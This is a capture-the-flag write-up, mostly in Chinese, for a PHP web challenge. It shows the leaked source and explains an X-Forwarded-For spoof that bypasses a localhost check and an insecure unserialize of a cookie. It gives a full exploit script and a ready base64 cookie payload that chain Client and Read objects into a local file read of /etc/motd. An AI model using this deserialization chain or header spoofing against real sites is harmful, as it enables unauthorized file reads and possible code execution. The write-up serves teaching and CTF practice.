WEB-InfoSecCTF2022-Message of the day

Message of the Day

題目首頁顯示 You are not allowed to access.
先用 dirsearch 爆破目錄（找備份檔或外洩的原始碼）

發現 backup.zip，裡面有三個檔案：client.php、read.php、index.php（網站原始碼外洩）
  • index.php

    <?php

    include('client.php');

    /**
     * Resolve the "client IP" that the access check below compares against.
     *
     * NOTE(review): this is the challenge's first weakness. X-Forwarded-For is
     * an ordinary request header that any client can set, and its value is
     * returned verbatim — no trusted-proxy allow-list, no comparison with
     * REMOTE_ADDR — so "X-Forwarded-For: 127.0.0.1" spoofs localhost. The
     * socket peer address is only used when the header is absent or empty()
     * (so "" and "0" also fall through to REMOTE_ADDR).
     *
     * @return string|null header value, else $_SERVER['REMOTE_ADDR']
     */
    function getIP()
    {
        $forwarded = $_SERVER['HTTP_X_FORWARDED_FOR'] ?? '';
        // Attacker-controlled header wins whenever it is non-empty.
        return empty($forwarded) ? $_SERVER['REMOTE_ADDR'] : $forwarded;
    }

    // Gate on the spoofable getIP() value, then hand the cookie straight to
    // unserialize(). Every class loaded by now (Client, Message, Read) is a
    // candidate gadget; Client::__destruct fires as soon as the unserialized
    // object is discarded, because the return value is never assigned.
    if (getIP() !== '127.0.0.1') {
        header('HTTP/1.0 403 Forbidden');
        die('You are not allowed to access.');
    }

    if (isset($_COOKIE['client'])) {
        // NOTE(review): attacker-controlled bytes reach unserialize() with no
        // signature/MAC check and no allowed_classes restriction.
        unserialize(base64_decode($_COOKIE['client']));
    } else {
        // First visit: issue a serialized Client('Guest') as the cookie value.
        setcookie("client", base64_encode(serialize(new Client('Guest'))));
    }
    ?>
  • read.php

    <?php
    /**
     * Unfinished file reader ("still in development phase"). The application
     * never instantiates it, but client.php includes this file before
     * index.php calls unserialize(), so it is available as a gadget.
     */
    class Read {

        // Path handed to include(). Private, but unserialize() restores it
        // from the "\0Read\0file_name" key of attacker-supplied bytes.
        private $file_name;

        /**
         * include() $this->file_name, then echo $val.
         *
         * NOTE(review): include() executes any PHP inside the target and
         * emits the rest verbatim — with a controlled path this is a local
         * file read (or worse, if the target contains PHP tags).
         */
        public function print($val) {
            $target = $this->file_name;
            include($target);
            echo $val;
        }
    }
    ?>
  • client.php

    <?php
    include('read.php');

    /**
     * The object index.php stores in the "client" cookie.
     *
     * Serialized shape (private properties carry a "\0Client\0" prefix):
     *   O:6:"Client":2:{s:12:"\0Client\0name";...;s:11:"\0Client\0tmp";O:7:"Message":0:{}}
     *
     * NOTE(review): __destruct is the gadget entry point. After unserialize()
     * it calls print() on whatever object was restored into $tmp, so the
     * cookie can substitute any loaded class that defines print() (Read).
     */
    class Client {

        private $name;  // value forwarded to $tmp->print()
        private $tmp;   // Message by default; arbitrary object after unserialize()

        function __construct($name) {
            $this->name = $name;
            $this->tmp = new Message();
        }

        function __destruct() {
            $sink = $this->tmp;
            $sink->print($this->name);
        }
    }

    /**
     * Default $tmp for Client: prints a fixed greeting followed by $val.
     * Harmless on its own; the risk is that Client::__destruct dispatches
     * print() on whatever object $tmp holds, not specifically on Message.
     */
    class Message {

        public function print($val) {
            $greeting = "Tigers and bears may be stronger predators, but wolves don't perform in circus, ";
            echo $greeting . $val . "!";
        }

    }

    ?>
拿到三個文件的source code
首先 index.php 用 $_SERVER['HTTP_X_FORWARDED_FOR'] 取得使用者 IP：有這個 header 就直接回傳，沒有才看 REMOTE_ADDR。
X-Forwarded-For 是使用者可控的 request header，伺服器也沒有限制只信任 proxy 所設的值，用它做存取控制並不安全。
直接加上 X-Forwarded-For: 127.0.0.1 就能繞過 403。

接著會把 cookie client 的內容 base64 解碼後直接 unserialize，沒有簽章驗證、也沒有限制 allowed_classes，反序列化出來的可以是任何已載入的 class：
unserialize(base64_decode($_COOKIE['client']));

unserialize 的回傳值沒有被接住，物件馬上被釋放而觸發 Client::__destruct，它會對 $this->tmp 呼叫 print()；正常情況下 $tmp 是 Message。
把 $tmp 換成 Read 物件即可，因為 Read::print() 會 include($this->file_name)；把 file_name 設成想讀的檔案就能做到本地檔案讀取（include 會原樣輸出非 PHP 內容，若檔案含 PHP 標籤則會被執行）。
  • exp.php

    <?php

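    /**
     * Stand-in for the target's Read class; only its serialized shape matters
     * (class name plus the private file_name property, emitted as the
     * "\0Read\0file_name" key).
     *
     * Fix vs. the original stub: print() is a no-op here. Client::__destruct
     * calls $tmp->print() when $test goes out of scope at the end of exp.php,
     * so the original stub include()d /etc/motd on the *generator* host and
     * appended its contents (plus '/etc/passwd') after the base64 payload.
     * The server-side Read does the real include; this stub never needs to.
     */
    class Read {

        // Path the server-side Read::print() will include(). /etc/motd is the
        // guess from the challenge title ("Message of the Day").
        private $file_name = '/etc/motd';

        // Same signature as the server's gadget so __destruct still resolves;
        // deliberately does nothing on the generator host.
        public function print($val) {
        }
    }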

    /**
     * Mirrors the target's Client class so serialize() emits the same class
     * and property names, but wires $tmp to Read instead of Message. That
     * swap is the whole exploit: on the server, Client::__destruct ->
     * Read::print -> include($file_name).
     */
    class Client {

        private $name;  // echoed by Read::print() after the include; not a path
        private $tmp;   // the gadget object: Read

        function __construct($name) {
            $this->tmp = new Read();
            $this->name = $name;
        }

        function __destruct() {
            $gadget = $this->tmp;
            $gadget->print($this->name);
        }

    }

    /**
     * Copy of the target's Message class. Not part of the chain (the payload
     * replaces it with Read); kept so the script mirrors the server's classes.
     */
    class Message {

        public function print($val) {
            $greeting = "Tigers and bears may be stronger predators, but wolves don't perform in circus, ";
            echo $greeting . $val . "!";
        }

    }

    // Build the chain: a Client whose $tmp is a Read pointing at /etc/motd.
    // The constructor argument becomes Client::$name, which Read::print()
    // only echoes after the include — it is NOT the file being read.
    $test = new Client('/etc/passwd');

    // Private property names embed NUL bytes, so the serialized string is
    // base64-wrapped before it goes into the cookie.
    $serialized = serialize($test);
    $y = base64_encode($serialized);
    echo $y;

    ?>
  • requests get flag

根據題名 Message of the Day 推測 flag 放在 /etc/motd，所以把 payload 的 file_name 設為 /etc/motd（Client 的 name 參數只會被 echo 出來，不影響讀哪個檔）。送出請求時要同時帶上 cookie 與 X-Forwarded-For header：
    Cookie: client=Tzo2OiJDbGllbnQiOjI6e3M6MTI6IgBDbGllbnQAbmFtZSI7czoxMToiL2V0Yy9wYXNzd2QiO3M6MTE6IgBDbGllbnQAdG1wIjtPOjQ6IlJlYWQiOjE6e3M6MTU6IgBSZWFkAGZpbGVfbmFtZSI7czo5OiIvZXRjL21vdGQiO319

    X-Forwarded-For: 127.0.0.1


WEB-InfoSecCTF2022-Message of the day
https://0xbe61a55f.github.io/2022/12/04/WEB-InfoSecCTF2022-Message of the day/